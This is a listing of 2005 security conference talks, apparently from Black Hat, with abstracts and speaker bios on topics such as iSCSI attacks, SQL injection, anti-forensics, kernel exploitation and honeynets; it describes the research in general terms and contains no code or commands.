Himanshu Dwivedi's presentation will discuss the severe security issues that exist in the default implementations of iSCSI storage networks/products. The presentation will cover iSCSI storage as it pertains to the basic principals of security, including enumeration, authentication, authorization, and availability.  The presentation will contain a short overview of iSCSI for security architects and basic security principals for storage administrators. The presentation will continue into a deep discussion of iSCSI attacks that are capable of compromising large volumes of data from iSCSI storage products/networks.  The iSCSI attacks section will also show how simple attacks can make the storage network unavailable, creating a devastating problem for networks, servers, and applications. The presenter will also follow-up each discussion of iSCSI attacks with a demonstration of large data compromise. iSCSI attacks will show how a large volume of data can be compromised or simply made unavailable for long periods of time without a single root or administrator password. The presentation will concluded with existing solutions from responsible vendors that can protect iSCSI storage networks/products. Each iSCSI attack/defense described by the presenter will contain deep discussions and visual demonstrations, which will allow the audience to fully understand the security issues with iSCSI as well as the standard defenses.

Himanshu Dwivedi is a founding partner of iSEC Partners, LLC. a strategic security organization. Himanshu has 11 years experience in security and information technology. Before forming iSEC, Himanshu was the Technical Director for @stake’s bay area practice, the leading provider for digital security services. His professional experiences includes application programming, infrastructure security, secure product design, and is highlighted with deep research and testing on storage security for the past 5 years.   

Himanshu has focused his security experience towards storage security, specializing in SAN and NAS security. His research includes iSCSI and Fibre Channel (FC) Storage Area Networks as well as IP Network Attached Storage.  Himanshu has given numerous presentations and workshops regarding the security in SAN and NAS networks, including conferences such as BlackHat 2004, BlackHat 2003, Storage Networking World, Storage World Conference, TechTarget, the Fibre Channel Conference, SAN-West, SAN-East, SNIA Security Summit, Syscan 2004, and Bellua 2005. 

Himanshu currently has a patent pending on a storage design architecture that he co-developed with other @stake professionals. The patent is for a storage security design that can be implemented on enterprise storage products deployed in Fibre Channel storage networks. Additionally, Himanshu has published three books, including "The Complete Storage Reference" – Chapter 25 Security Considerations (McGraw-Hill/Osborne), "Implementing SSH" (Wiley Publishing), and "Securing Storage" (Addison Wesley Publishing), which is due out in the fall of 2005. Furthermore, Himanshu has also published two white papers. The first white paper Himanshu wrote is titled “Securing Intellectual Property”, which provides insight and recommendations on how to protect an organization’s network from the inside out.  Additionally, Himanshu has written a second white paper titled Storage Security, which provides the basic best practices and recommendations in order to secure a SAN or a NAS storage network.

Return to the top of the page

Building Self-Defending Web Applications: Secrets of Session Hacking and Protecting Software Sessions
Arian J. Evans, Senior Security Engineer, Fishnet Security
Daniel Thompson, Lead Interface Developer, Secure Passage

Web applications are constantly under attack, and must defend themselves. Sadly, today, most cannot.

There are several key elements to building self-defending software but only a few are focused on today, including input validation, output encoding, and error handling. Strong Session Handing and effective Authorization mechanisms are almost completely ignored in web application software development. Many of the threats are well known, but the techniques for building applications that can defend themselves against the known threat landscape are still ignored due to lack of documentation, lack of sample code, and lack of awareness of the threats and attack methods.

This ignorance is dangerous; The landscape has changed. In April 2005 alone, zero-day scripted session attacks were discovered in the wild for eBay and other high-profile web applications that you use.

Session and Authorization attacks are real, mature, and increasing in frequency of use in the wild. They are also misunderstood or ignored by most of the development and web application security community.

This presentation will:

  • Summarize and categorize what State, Session, and Authorization attacks are.
  • Provide you with a simple, effective Taxonomy for understanding the threats.
  • Provide you with an entirely new understanding of Cross-Site Scripting (XSS).
  • Disclose new Session and Authorization attacks released in recent months.
  • Show you how to attack your intranet from the Internet using Your browser without You knowing.
  • Unveil the Paraegis Project which will provide free web app security code for .NET, J2EE, and Flash frameworks.
  • Paraegis will include functional code elements for DAT generation and stopping automated scanners/scripts.
  • Paraegis will show you how to reduce the attack surface of XSS from "all people all the time" to "one person one time" resulting in XSS vulnerabilities being virtually unexploitable.

The techniques presented are simple, innovative, realistically usable, and predominantly missing in today's webapp designs. The Paraegis Project will release code that will not only demonstrate this, but that you will be able to use in your applications for free.

Arian Evans has spent the last seven years pondering information security and disliking long bios. His focus has been on intrusion detection and application security.

He currently works for FishNet Security researching and developing new methodologies for evaluating the security posture of applications and databases, in addition to helping FishNet clients design, deploy, and defend their applications. Arian works with clients worldwide for FishNet Security, and has worked with the Center for Internet Security, FBI, and various client organizations on web application-related hacking incident response.

Arian contributes to the information security community in the form of vulnerability research & advisories, writing courseware and teaching classes on how to build secure web applications, and questioning everything. He frequently breaks things, and sometimes figures out how to put them back together again.

Daniel Thompson is the lead interface developer for Secure Passage, a software company specializing in network device change management. His interest in computer graphics and visual design started over fifteen years ago while searching for an efficient way to create fake documents. Currently Daniel works with Java, C# and ActionScript to create secure, dependable, distributed applications. He targest .JSP, ASP.NET and the Macromedia Flash Player for delivery to the browser and Eclipse SWT and Microsoft WindowsForms for delivery to the desktop. In his spare time he works on data visualization and generative graphics, as well as the occasional game.

Dan became interested in information security when Arian Evans started reading his email.

Return to the top of the page

Advance SQL Injection Detection by Join Force of Database Auditing and Anomaly Intrusion Detection
Yuan Fan, CISSP, Software Engineer, Arcsight

This topic will present the proposal/idea/work from the author’s master graduate project about effective detection of SQL Injection exploits while lowering the number of false positives. It gives detail analysis example of how database auditing could help this case, and also presents the challenge with anomaly detection for this attack and how the author tried to solve them. Finally a correlation between the two will be presented.

Yuan Fan, CISSP, has worked in the network security area for more than 7 years. He currently works for ArcSight as a Software Engineer. He holds a Master of Computer Engineering degree from San Jose State University. The tool he is writing for master graduate research project related to this topic is a Java-based, multilayer anomaly intrusion detection system.

Return to the top of the page

Advanced SQL Injection in Oracle Databases
Esteban Martínez Fayó, Argeniss

This presentation shows new ways to attack Oracle Databases. It is focused on SQL injection vulnerabilities and how can be exploited using new techniques. It also explains how to see the internal PL/SQL code that is vulnerable in Oracle built-in procedures and examples using recently discovered vulnerabilities. Buffer overflows, remote attacks using web applications and some ways to protect from these attacks also will be shown.

Esteban Martínez Fayó is a security researcher; he has discovered and helped to fix multiple security vulnerabilities in major vendor software products. He specializes in application security and is recognized as the discoverer of most of the vulnerabilities in Oracle server software.

Esteban currently works for Argeniss doing information security research and developing security related software solutions for Application Security Inc.

Return to the top of the page

BlackHat Standup: “Yea I’m a Hacker…”
James C. Foster, Deputy Director of Global Security Solution Development, Computer Sciences Corporation

In a refreshing different format, Foster cracks the audience with a twenty minute comedic dissertation of the past year in the information security industry. Performing standup, Foster will roast the year’s worst companies’ business mistakes, stereotypes, books, websites, Fucked Company security excerpts in addition to posing fun of those who don’t have the dream job, boatloads of cash, the supermodel girlfriend, or cabana boy – boyfriend with humorous hints of how to get there.  Wrapping up the session, Foster will make his 2006 security predictions.

James C. Foster, Fellow, is the Deputy Director of Global Security Solution Development for Computer Sciences Corporation. Foster is responsible for directing and managing the vision, technology, and operational design for CSC’s global security services. Prior to joining CSC, Foster was the Director of Research and Development for Foundstone Inc (acquired by McAfee). and was responsible for all aspects of product, consulting, and corporate R&D initiatives. Prior to joining Foundstone, Foster was a Senior Advisor and Research Scientist with Guardent Inc (acquired by Verisign) and an editor at Information Security Magazine(acquired by TechTarget Media), subsequent to working as an Information Security and Research Specialist for the Department of Defense. Foster's core competencies include high-tech management, international software development and expansion, web-based application security, cryptography, protocol analysis, and search algorithm technology. Foster has conducted numerous code reviews for commercial OS components, Win32 application assessments, and reviews on commercial and government cryptography implementations.

Foster is a seasoned speaker and has presented throughout North America at conferences, technology forums, security summits, and research symposiums with highlights at the Microsoft Security Summit, BlackHat, MIT Wireless Research Forum, SANS, MilCon, TechGov, InfoSec World 2001, and the Thomson Security Conference. He also is commonly asked to comment on pertinent security issues and has been cited in USAToday, Information Security Magazine, Baseline, Computer World, Secure Computing, and the MIT Technologist. Foster holds degrees in Business Administration, Software Engineering, and Management of Information Systems and has attended the Yale School of Business, Harvard University, the University of Maryland, and is currently a Fellow at University of Pennsylvania's Wharton School of Business.

Foster is also a well published author with multiple commercial and educational papers; and has authored, contributed, or edited for major publications to include Snort 2.0, Snort 2.1 2nd Edition, Hacking Exposed 4th Ed and 5th Edition, Special Ops Security, Anti-Hacker Toolkit 2nd Ed, Advanced Intrusion Detection, Hacking the Code, Anti-Spam Toolkit, Programmer's Ultimate Security DeskRef, Google for Penetration Testers, Buffer Overflow Attacks, and Sockets/Porting/and Shellcode.

Return to the top of the page

Catch Me If You Can: Exploiting Encase, Microsoft, Computer Associates, and the rest of the bunch…
James C. Foster, Deputy Director of Global Security Solution Development, Computer Sciences Corporation
Vincent T. Liu, Security Specialist

Don’t get caught.

Building off of Foster’s log manipulation and bypassing forensics session at BlackHat Windows 2004, James C. Foster and Vincent T. Liu will share over eighteen months of continued private forensic research with the Black Hat audience including ground-breaking vulnerabilities and key weaknesses in some of the most popular tools used by forensic examiners including EnCase, CA eTrustAudit, and Microsoft ISA Server. Watch live demonstrations as Foster and Vinnie detail how to leverage these weaknesses to avoid being detected, and discover the theory and practice behind the most effective and cutting-edge anti-forensics techniques. Finally, learn how to turn a forensic analyst’s training against himself by joining the speakers in a lively discussion of the “Top 10 Ways to Exploit a Forensic Examiner”.

This talk should be required viewing for all those on both sides of the fence, so come prepared to watch trusted forensics tools crumble.

James C. Foster, Fellow, is the Deputy Director of Global Security Solution Development for Computer Sciences Corporation. Foster is responsible for directing and managing the vision, technology, and operational design for CSC’s global security services. Prior to joining CSC, Foster was the Director of Research and Development for Foundstone Inc (acquired by McAfee). and was responsible for all aspects of product, consulting, and corporate R&D initiatives. Prior to joining Foundstone, Foster was a Senior Advisor and Research Scientist with Guardent Inc (acquired by Verisign) and an editor at Information Security Magazine(acquired by TechTarget Media), subsequent to working as an Information Security and Research Specialist for the Department of Defense. Foster's core competencies include high-tech management, international software development and expansion, web-based application security, cryptography, protocol analysis, and search algorithm technology. Foster has conducted numerous code reviews for commercial OS components, Win32 application assessments, and reviews on commercial and government cryptography implementations.

Foster is a seasoned speaker and has presented throughout North America at conferences, technology forums, security summits, and research symposiums with highlights at the Microsoft Security Summit, BlackHat, MIT Wireless Research Forum, SANS, MilCon, TechGov, InfoSec World 2001, and the Thomson Security Conference. He also is commonly asked to comment on pertinent security issues and has been cited in USAToday, Information Security Magazine, Baseline, Computer World, Secure Computing, and the MIT Technologist. Foster holds degrees in Business Administration, Software Engineering, and Management of Information Systems and has attended the Yale School of Business, Harvard University, the University of Maryland, and is currently a Fellow at University of Pennsylvania's Wharton School of Business.

Foster is also a well published author with multiple commercial and educational papers; and has authored, contributed, or edited for major publications to include "Snort 2.0", "Snort 2.1" 2nd Edition, "Hacking Exposed" 4th Ed and 5th Ed, "Special Ops Security", "Anti-Hacker Toolkit" 2nd Ed, "Advanced Intrusion Detection", "Hacking the Code", "Anti-Spam Toolkit", "Programmer's Ultimate Security DeskRef", "Google for Penetration Testers", "Buffer Overflow Attacks", and "Sockets, Shellcode, Porting, and Coding".

Vincent Liu is an IT security specialist at a Fortune 100 company where he is responsible for assessing the security of the enterprise network infrastructure and participating as a member of the global incident response team.Before moving to his current position, Vincent worked as a consultant with the Ernst & Young Advanced Security Center and as an analyst at the National Security Agency. His specialties include penetration testing, web application assessments, incident response, binary reverse engineering, and exploit development.

Vincent holds a degree in Computer Science and Engineering from the University of Pennsylvania. While at Penn, Vincent taught courses on operating system implementation and C programming, and was involved with DARPA-funded research into advanced intrusion detection techniques. He is currently a contributor to the Metasploit project, and is a contributing author for Sockets, Shellcode, Porting, and Coding. Vincent has also studied at the University of Maryland and the University of Kentucky.

Return to the top of the page

Hacking in a Foreign Language: A Network Security Guide to Russia (and Beyond)
Kenneth Geers

Has your network ever been hacked, and all you have to show for your investigative efforts is an IP address belonging to an ISP in Irkutsk? Are you tired of receiving e-mails from Citibank that resolve to Muscovite IP addresses?  Would you like to hack the Kremlin? Or do you think that the Kremlin has probably owned you first? Maybe you just think that Anna Kournikova is hot.  If the answer to any of the above questions is yes, then you need an introduction to the Gulag Archipelago of the Internet, the Cyberia of interconnected networks, Russia.

Do not let the persistent challenges of crossing international boundaries intimidate you any longer. In this briefing, we will follow several real-world scenarios back to Russia, and you will learn valuable strategies for taking your investigations and operations one big geographical step further.  A brief introduction to Russia will be followed by 1,000 traceroutes over the frozen tundra described in detail, along with an explanation of the relationship between cyber and terrestrial geography. Information will be provided on Russian hacker groups and law enforcement personnel, as well as a personal interview with the top Russian cyber cop, conducted in Russian and translated for this briefing.

Quick: name one significant advantage that Russian hackers have over you.  They can read your language, but you cannot read theirs! Since most Westerners cannot read Russian, the secrets of Russian hacking are largely unknown to Westerners. You will receive a short primer on the Russian language, to include network security terminology, software translation tools, and cross-cultural social engineering faux-pas (this method will apply to cracking other foreign languages as well).

Hacking in a Foreign Language details a four-step plan for crossing international frontiers in cyberspace. First, you must learn something about the Tribe: in this case, the chess players and the cosmonauts. Second, you must study their cyber Terrain. We will examine the open source information and then try to create our own network map using traceroutes. Third, we will look at the Techniques that the adversary employs. And fourth, we will conquer Translation. The goal is to level the playing field for those who do not speak a foreign language. This briefing paves the way for amateur and professional hackers to move beyond their lonely linguistic and cultural orbit in order to do battle on far-away Internet terrain.

Kenneth Geers (M.A., University of Washington, 1997) is an accomplished computer security expert and Russian linguist. His career includes many years working as a translator, programmer, website developer and analyst. The oddest job he has had was working on the John F. Kennedy Assassination Review Board (don't ask). He also waited tables in Luxembourg, harvested flowers in the Middle East, climbed Mount Kilimanjaro, was bitten by a deadly bug in Zanzibar and made Trappist beer at 3 AM in the Rochefort monastery. He loves to read computer logfiles. In his free time, he plays chess and serves as a SANS mentor. He loves Russia, his wife Jeanne, and daughters Isabelle and Sophie. Kenneth drinks beer and feeds the empty cans to camels.

Return to the top of the page

Can You Really Trust Hardware? Exploring Security Problems in Hardware Devices
Joe Grand, President & CEO, Grand Idea Studio, Inc.

Most users treat a hardware solution as an inherently trusted black box. "If it's hardware, it must be secure," they say. This presentation explores a number of classic security problems with hardware products, including access to stored data, privilege escalation, spoofing, and man-in-the-middle attacks. We explore technologies commonly used in the network and computer security industries including access control, authentication tokens, and network appliances. You'll leave this presentation knowing the consequence of blindly trusting hardware.

Joe Grand is the President of Grand Idea Studio, a San Diego-based product development and intellectual property licensing firm, where he specializes in embedded system design, computer security research, and inventing new concepts and technologies. Joe has testified before the United States Senate Governmental Affairs Committee and is a former member of the legendary hacker collective L0pht Heavy Industries. He is the author of "Hardware Hacking: Have Fun While Voiding Your Warranty" and a co-author of "Stealing The Network: How to Own A Continent". Joe holds a Bachelor of Science degree in Computer Engineering from Boston University.

Return to the top of the page

Top Ten Legal Issues in Computer Security
Jennifer Stisa Granick, Executive Director, Center For Internet and Society, Stanford Law School

This will be a practical and theoretical tutorial on legal issues related to computer security practices. In advance of the talk, I will unscientifically determine the “Top Ten LegalQuestions About Computer Security” that Black Hat attendees have and will answer themas clearly as the unsettled nature of the law allows. While the content of the talk is audience driven, I expect to cover legal issues related to strike-back technology,vulnerability disclosure, civil and criminal liability for maintaining insecure computersystems, reverse engineering, the Digital Millennium Copyright Act, trade secret law and licensing agreements.

Jennifer Stisa Granick joined Stanford Law School in January 2001, as Lecturer in Law and Executive Director of the Center for Internet and Society (CIS). She teaches, speaks and writes on the full spectrum of Internet law issues including computercrime and security, national security, constitutional rights, and electronic surveillance, areas in which her expertise is recognized nationally.

Granick came to Stanford after almost a decade practicing criminal defense law in California. Her experience includes stints at the Office of the State Public Defender and at a number of criminal defense boutiques, before founding the Law Offices of Jennifer S. Granick, where she focused on hacker defense and other computer law representations at the trial and appellate level in state and federal court. At Stanford, she currently teaches the Cyberlaw Clinic, one of the nation's few public interest law and technology litigation clinics.

Granick continues to consult on computer crime cases and serves on the Board of Directors of the Honeynet Project, which collects data on computer intrusions for the purposes of developing defensive tools and practices and the Hacker Foundation, a research and service organization promoting the creative use of technological resources. She was selected by Information Security magazine in 2003 as one of 20 "Women of Vision" in the computer security field. She earned her law degree from University of California, Hastings College of the Law and her undergraduate degree from the New College of the University of South Florida.

Return to the top of the page

Phishing with Super Bait
Jeremiah Grossman, CTO and co-founder, WhiteHat Security

The use of phishing/cross-site scripting hybrid attacks for financial gain is spreading. It’s imperative that security professionals familiarize themselves with these new threats to protect their websites and confidential corporate information.

This isn’t just another presentation about phishing scams or cross-site scripting. We’re all very familiar with each of those issues. Instead, we’ll discuss the potential impact when the two are combined to form new attack techniques. Phishers are beginning to exploit these techniques, creating new phishing attacks that are virtually impervious to conventional security measures. Secure sockets layer (SSL), blacklists, token-based authentication, browser same-origin policy, and monitoring / take-down services offer little protection. Even eyeballing the authenticity of a URL is unlikely to help.

By leveraging cross-site scripting, the next level of phishing scams will be launched not from look-alike web pages, but instead from legitimate websites! This presentation will demonstrate how these types of attacks are being achieved. We’ll also demonstrate the cutting edge exploits that can effectively turn your browser into spyware with several lines of JavaScript.  And, we’ll give you the steps you need to take to protect your websites from these attacks.  

Jeremiah Grossman is the founder and Chief Technology Officer of WhiteHat Security (, where he is responsible for web application security R&D and industry evangelism. As a seven-year industry veteran and well-known security expert, Mr. Grossman is a frequent conference speaker at the BlackHat Briefings, ISSA, ISACA, NASA, and many other industry events. Mr. Grossman's research, writings, and discoveries have been featured in USA Today, VAR Business, NBC, ZDNet, eWeek, BetaNews, etc.  Mr. Grossman is also a founder of the Web Application Security Consortium (WASC), as well as a contributing member of the Center for Internet Security Apache Benchmark Group. Prior to WhiteHat, Mr. Grossman was an information security officer at Yahoo!, responsible for performing security reviews on the company's hundreds of websites.

Return to the top of the page

The Art of Defiling: Defeating Forensic Analysis
the Grugq

The Grugq has been at the forefront of forensic research for the last six years, during which he has been pioneering in the realm of anti-forensic research and development. During this time, he has also worked with a leading IT security consultancy and been employed at a major financial institution. Most recently he has been involved with an innovative security software development start-up company. Currently the Grugq is a freelance forensic and IT security consultant. While not on engagements, the Grugq continues his research on security, forensics and beer.

Return to the top of the page

Stopping Injection Attacks with Computational Theory
Robert J. Hansen
Meredith L. Patterson

Input validation is an important part of security, but it's also one of the most annoying parts. False positives and false negatives force us to choose between convenience and security—but do we have to make that choice? Can't we have both? In this talk two University of Iowa researchers will present new methods of input validation which hold promise to give us both convenience _and_ security. A basic understanding of SQL and regular expressions is required.

Robert J. Hansen: B.A. in Computer Science from Cornell College, 1998. Graduate student at the University of Iowa, 2003-2005, researching secure voting systems with Prof. Doug Jones. Senior Security Engineer at Exemplary Technologies, 2000; Cryptographic Engineer at PGP Security, 2000-2001.

Meredith L. Patterson: B.A. English (Linguistics) from the University of Houston, 2000. M.A. Linguistics from the University of Iowa, 2003. Graduate student at the University of Iowa, 2003-2005, studying data mining with Prof. Hwanjo Yu. Bioinformatics intern at Integrated DNA Technologies, 2003-2005.

Return to the top of the page

GEN III Honeynets: The birth of roo
Allen Harper, Security Engineer, DoD
Edward Balas, Security Researcher, Advanced Network Management Laboratory, Indiana University

A Honeypot is a information gathering system, designed for attackers to interact with. A honeynet, simply put, is a network of honeypots. The key component of a honeynet is the honeywall. The honeywall is used to provide the following capabilities:

  • Data Capture. The ability to collect information about the attack.
  • Data Control. The ability to restrict the amount of damage that can be done from one of your honeypots to another network.
  • Data Analysis. The ability to conduct limited forensics analysis on the network traffic or compromised honeypots in order to discover the attackers methodology.
  • Data Alerting. The ability to alert an analyst as to suspicious activity.

In 2001, released a honeywall, called eeyore, which allowed for Gen II honeynets and improved both Data Capture and Data Control capabilities over the Gen I honeynets.

In the summer of 2005, released a new honeywall, called roo, which enables Gen III honeynets. The new roo has many improvements over eeyore:

  • Improved installation, operation, customization
  • Improved data capture capability by introducing a new hflow database schema and pcap-api for manipulating packet captures.
  • Improved data analysis capability by introducing a new web based
    analysis tool called walleye.
  • Improved user interfaces and online documentation

The purpose of this presentation is to describe the new capabilities of Gen III honeynets and demonstrate the new roo. In addition, a road ahead will be discussed to describe a global honeygrid of connected honeynets.

Allen Harper is a Security Engineer for the US Department of Defense in Northern Virginia. He holds a MS in Computer Science from the Naval Post Graduate School. For the Honeynet Project, Allen leads the development of the GEN III honeywall CDROM, now called roo. Allen was a co-author of Gray Hat, the ethical hackers handbook published by McGraw Hill and served on the winning team (sk3wl of root) at last year's DEFCON Capture the Flag contest.

Edward Balas is a security researcher within the Advanced Network Management Laboratory at Indiana University. As a member of the Honeynet Project, Edward leads the development of Sebek and several key GenIII Honeynet data analysis components. Prior to joining Indiana Unviersity, Edward worked for several years as a network engineer developing tools to detect and manage network infrastructure problems.

Return to the top of the page

Using Causal Analysis to Establish Meaningful Connections between Anomalous Behaviors in a Networking Environment
Ken Hines, Ph.D., CTO, GraniteEdge Networks

Fueled by business needs such as supply chain integration and outsourcing, modern enterprises must open up portions of their networks to potentially untrusted outsiders. Combined with the troubling aspects of malicious insiders, ever more sophisticated attacks, increasing network complexity, and strong pressure from regulatory bodies to rapidly identify breaches and assess damages, there is a rapidly growing concern over internal network security. IT departments must work harder than ever to prevent insiders and outsiders from gaining unauthorized access to critical assets deep in the network, and if such access ever occurs, identify and report on, the impact of such a security breach.

In order to gain real insight into the dynamic behavior of their networks, IT departments must monitor huge quantities of data, where individual elements of a sophisticated attack may be spread out over long periods of time, and vast numbers of logs. Many tools are available to identify individual phases of an attack, such as IDSs, network based anomaly detection tools, host based monitoring tools, and even firewalls. However, this data is presented to the security analyst as a series of unrelated suspicious events. Because of the complexity of modern networks there are always isolated and seemingly suspicious things occurring on the network. To find a sophisticated breach the individual pieces of an attack need to be tied together for successful analysis.  

One approach to determining relationships between events is by defining rules, such as: if some set of events happens around the same time, they are probably related, and should be presented as a correlated event. Unfortunately this places the burden on the security analyst of predefining attack scenarios for their particular network. Unlike virus detection which can leverage the entire anti-virus community to identify and write appropriate signature files, internal network security has no such analogy. Every enterprise network has unique characteristics requiring company specific rules. While rules are good for identifying problems with well defined signatures, they aren’t capable of relating attack elements separated by large time intervals, and obscured by benign activity on the surrounding hosts. The missing piece is causal analysis, which can automatically link together suspicious events independent of the normal network activity that occurs between the various phases of a security breach. The benefit of the causal analysis approach is that chains of related and suspicious activity provide a strategic overview of network behavior allowing a security analyst to focus their efforts on attacks in progress. When they have a readable chain of anomalous behavior, the security team can trace the attack vector back to the entry point, and find the so-called “patient zero.”

This presentation demonstrates the value of causal analysis using a simple example that involves social networks rather than computer networks, how this example is really a metaphor for a very common form of computer network attack, and how causal analysis is equally appropriate in finding this sort of attack in enterprise networks. It then presents some of the factors that compound the difficulty of this analysis in real networks, and describes approaches that simplify this complexity. Using the techniques described, two real “stepping stone” attacks are outlined and diagrammed to illustrate the power of causal analysis. Finally, it demonstrates how this analysis can be combined with other forms of security analytic and mitigation techniques to provide a formidable barrier against network attacks.

Ken Hines earned his Ph.D. in computer science at the University of Washington in 2000, by successfully defending his dissertation, which applied causal analysis to debugging heterogeneous distributed embedded systems.  Since then, he has founded two venture funded companies, and actively developed commercial products that apply causal analysis to solving complex problems related to distributed embedded systems, network processor based network infrastructure, and finally networks as a whole. 

While a graduate student, Ken was one of the primary researchers on the Chinook Hardware/Software Co-synthesis project, and published a number of papers on distributed debugging, distributed hardware/software co-simulation, and co-synthesis for heterogeneous distributed embedded systems.

Return to the top of the page

Remote Windows Kernel Exploitation - Step In To the Ring 0
Barnaby Jack, Senior Research Engineer, eEye Digital Security, Inc

Almost every possible method and technique regarding Windows exploitation has been discussed in depth. Surprisingly, a topic that has rarely been touched on publicly is the remote exploitation of Win32 kernel vulnerabilities; a number of kernel vulnerabilities have been published, yet no exploit code has surfaced in the public arena. I predict we will see more kernel vulnerabilities in the future, as more core networking components are being implemented at the driver level.

In this presentation I will walk through the remote exploitation of a kernel level vulnerability. A number of payloads will be discussed and demonstrated, and I will explain how to overcome the various obstacles that arise when attempting to exploit ring 0 vulnerabilities. As a final demonstration, we will say goodnight to the Windows OS entirely.

Barnaby Jack is a Senior Research Engineer at eEye Digital Security. His role at eEye involves developing internal technologies, malicious code analysis, vulnerability research—and applying this research to the eEye product line. His main areas of interest include reverse engineering and operating system internals. He has been credited with the discovery of numerous security vulnerabilities, and has published multiple papers on new exploitation methods and techniques.

Return to the top of the page

Black Ops 2005
Dan Kaminsky

Another year, another batch of packet related stunts. A preview:

  1. A Temporal Attack against IP
    It is commonly said that IP is a stateless protocol. This is not entirely true. We will discuss a mechanism by which IP's limited stateful mechanisms can be exploited to fingerprint operating systems and to evade most intrusion detection systems.

  2. Application-layer attacks against MD5
    We will show how web pages and other executable environments can be manipulated to emit arbitrarily different content with identical MD5 hashes.

  3. Realtime visualizations of large network scans
    Building on Cheswick's work, I will demonstrate tools for enhancing our comprehension of the torrential floods of data received during large scale network scans. By leveraging the 3D infrastructure made widely available for gaming purposes, we can display and animate tremendous amounts of data for administrator evaluation.

  4. A High Speed Arbitrary Tunneling Stack
    Expanding on last year's talk demonstrating live streaming audio over DNS, I will now demonstrate a reliable communication protocol capable of scaling up to streaming video over multiple, arbitrary, potentially asymmetric transports.

Dan Kaminsky, also known as Effugas, is a Senior Security Consultant for Avaya's Enterprise Security Practice, where he works on large-scale security infrastructure. Dan's experience includes two years at Cisco Systems designing security infrastructure for large-scale network monitoring systems.

He is best known for his work on the ultra-fast port scanner scanrand, part of the "Paketto Keiretsu", a collection of tools that use new and unusual strategies for manipulating TCP/IP networks. He authored the Spoofing and Tunneling chapters for "Hack Proofing Your Network: Second Edition", was a co-author of "Stealing The Network: How To Own The Box", and has delivered presentations at several major industry conferences, including Linuxworld, DefCon, and past Black Hat Briefings.

Dan was responsible for the Dynamic Forwarding patch to OpenSSH, integrating the majority of VPN-style functionality into the widely deployed cryptographic toolkit. Finally, he founded the cross-disciplinary DoxPara Research in 1997, seeking to integrate psychological and technological theory to create more effective systems for non-ideal but very real environments in the field. Dan is based in Silicon Valley.

Return to the top of the page

The Social Engineering Engagement Methodology - A Formal Testing process of the People and Process
Joseph Klein, Senior Security Consultant, Honeywell

The security of an organization is composed of technology, people and processes. In the last few years, many organizations have done a good job addressing technology but have focused very little on the people and processes.

This presentation reviews the formal methodology for performing Social Engineering Engagements. The method is divided into four sections including the Pre-Engagement, Pre-Assessment, Assessment and Post-Assessment.

The Pre-Engagement, is the sales process for performing the assessment. In this section, we will review the business justification and headlines of current attacks.

Pre-Assessment if focused on identifying the scope of the project, limitation, targets and attack vectors. Also included are examples of what information must be gathers for use in the assessment and post assessment phase.

The most interesting and tedious part is the actual assessment. In this section, we will discuss how to engage the target, utilize company information, how to achieve the goal and what to do when you are caught. Included in this section is also how and what to document about every contact.

Post assessment is the analysis and reporting phase. In it, we will review documenting findings, and mapping them to recommendations.

Joe Klein, CISSP is Senior Security Consultant at Honeywell and a member of the IPv6 Business Council. He performs network, application, web-application, wireless, source-code, host security reviews and security architecture design services for clients in the commercial and government space

Prior to joining Honeywell, Joe worked as a consultant performing attack and penetration assessments for many significant companies in the IT arena. While consulting, Joe also taught “Hacking and Incident Handling”, “IDS/IPS management” and “Managing Network Security” at a local college in Jacksonville Florida. 

He regularly speaking at conferences including Defcon, InfoSecWorld, PhreakNic and regional meetings including Infragard, ASIS and ISSA.

Return to the top of the page

Circumvent Oracle’s Database Encryption and Reverse Engineering of Oracle Key Management Algorithms
Alexander Kornbrust

This talk describes architecture flaws of the Oracle’s database encryption packages dbms_crypto and dbms_obfuscation_toolkit. These encryption packages are used to encrypt sensitive information in the database. A hacker can intercept the encryption key and use this key to decrypt sensitive information like clinical data, company secrets or credit card information. Even if a flexible key management algorithm (every row has his own key) is in use it is possible to reverse engineer this algorithm quite fast.

A basic knowledge of Oracle databases (PL/SQL) is recommended.

Alexander Kornbrust is the founder and CEO of Red-Database-Security GmbH, a company specialised in Oracle security. He is responsible for Oracle security audits and Oracle Anti-hacker trainings. Before that he worked several years for Oracle Germany, Oracle Switzerland and IBM Global Services as consultant.

Alexander Kornbrust is working with Oracle products as DBA and developer since 1992. During the last 5 years found over 100 security bugs in different Oracle products.

Publications and further information can be found at:

Return to the top of the page

CaPerl: Running Hostile Code Safely
Ben Laurie

There are many circumstances under which we would like to run code we don't trust. This talk presents a method for making that possible with various popular scripting languages—the test case is Perl, but the technique will work with other languages. Also presented is an open source implementation for Perl, and various examples of its use - for instance, a web server that will run arbitrary code uploaded to it. Although some experience of Perl is useful, it is not

The basis of the technique is to compile a slightly modified dialect of Perl into capability-enforcing standard Perl, which is then run using a vanilla Perl interpreter.

Ben Laurie has worked for years on cryptography and security, particularly in the open source world. Perhaps best known for authoring Apache-SSL, the ancestor of almost all secure free webservers, he is also a core team member of OpenSSL and a founding director of the Apache Software Foundation. In his copious spare time, he is Director of Security for The Bunker Secure Hosting. He has published papers on subjects as diverse as knotted DNA and anonymous money. His current obsessions are privacy and security.

Return to the top of the page

All New Ø-Day
David Litchfield, Founder, Next Generation Security Software

David Litchfield leads the world in the discovery and publication of computer security vulnerabilities. This outstanding research was recognised by Information Security Magazine who voted him as 'The World's Best Bug Hunter' for 2003. To date, David has found over 150 vulnerabilities in many of today's popular products from the major software companies (the majority in Microsoft, Oracle).

David is also the original author for the entire suite of security assessment tools available from NGSSoftware. This includes the flagship vulnerability scanner Typhon III, the range of database auditing tools NGSSquirrel for SQL Server, NGSSquirrel for Oracle, OraScan and Domino Scan II.

In addition to his world leading vulnerability research and the continued development of cutting edge security assessment software, David has also written or co-authored on a number of security related titles including, "SQL Server Security", "Shellcoder's handbook" and "Special Ops: Host and Network Security for Microsoft, UNIX and Oracle"

Return to the top of the page

Google Hacking for Penetration Testers
Johnny Long, Penetration Tester, CSC

